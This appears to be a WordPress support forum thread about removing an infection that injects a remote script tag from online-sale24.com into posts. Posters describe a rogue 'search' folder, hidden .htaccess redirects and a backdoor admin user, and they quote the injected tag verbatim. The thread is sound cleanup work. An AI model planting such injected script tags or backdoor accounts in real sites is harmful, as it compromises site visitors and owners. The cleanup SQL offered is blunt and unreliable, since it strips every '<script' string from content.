Plugin Author
Eli
(@scheeeli)
Have you run a Complete Scan with my Anti-Malware plugin and you have the latest definition updates?
Yes , I do this there is no Malware detected, but still I get Same link When i Open any Menu
Plugin Author
Eli
(@scheeeli)
This hack is something I have not seen before. It may be a new threat that has not yet been added to my definition updates. From your description it sounds like it is probably in your theme, maybe in the functions.php file.
If you can send me the infected file I can add it to my definition updates so that it can be automatically removed. If you want to zip up your whole theme and email it to me I can check it for you. You can email me directly: eli AT gotmls DOT net
Hello Eli
Thank you so much for your help
Actually i got it one Script: http://online-sale24.com/1.js in my All pages and post they add at bottom of page/post So i just remove it and All going well now, but I need to know that they add this script in each page Manully or they do some code and put in Some files ? I think you got my question what i mean.
Thanks
Ahir Hemant
Hi all,
I faced the same problem as you all did. After hours and days of searching I found, by myself, out of a mistake the source of this vyrus.
First, in the root of my website I found a folder called “search”.
It contains a folder called “cache” and a file called “search.php” and a .htaccess file.
Inside the cache folder of this search folder, there are 5 other folders called:
css
html
jpg
js
xml
Basically, the vyrus gets built out of this folder. I also found some redirects in my root’s .htaccess file, but very very low down in the file. So search very carefully, it’s below what you can firs see.
I will not post the contents of search.php as I don’t want to create any problems to this website.
So, I hope I helped you a bit and best regards to you all. Delete this “search” folder and the weird redirects in your .htaccess and everything should be fine. You could also check your theme’s header.php, just in case.
Best regards,
I have also found inside the Users, in wordpress admin, another user created by the vyrus:
Username: tEEebe777811, email: [email protected]
You should delete this user from the DB itself, it’s safer that way. Change your administrator password as soon as possible. Basically the virus could administrate your website as it pleased as it had administrator role inside the admin of your website.
I have also searched for “online-sale” inside my db and i have found over 50 articles containing this script:
<script type=’text/javascript’ src=’http://online-sale24.com/1.js’></script>
So you should check this too. This attack is far more complex than I thought.
I hope I helped you find a way to remove it.
Use sql queries like this, replacing parts of this “<script type=’text/javascript’ src=’http://online-sale24.com/1.js’></script>”
UPDATE wp_options SET option_value = replace(option_value, ‘<script’, ”) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;
UPDATE wp_posts SET guid = replace(guid, ‘<script’,”);
UPDATE wp_posts SET post_content = replace(post_content, ‘<script’, ”);
UPDATE wp_postmeta SET meta_value = replace(meta_value, ‘<script’, ”);
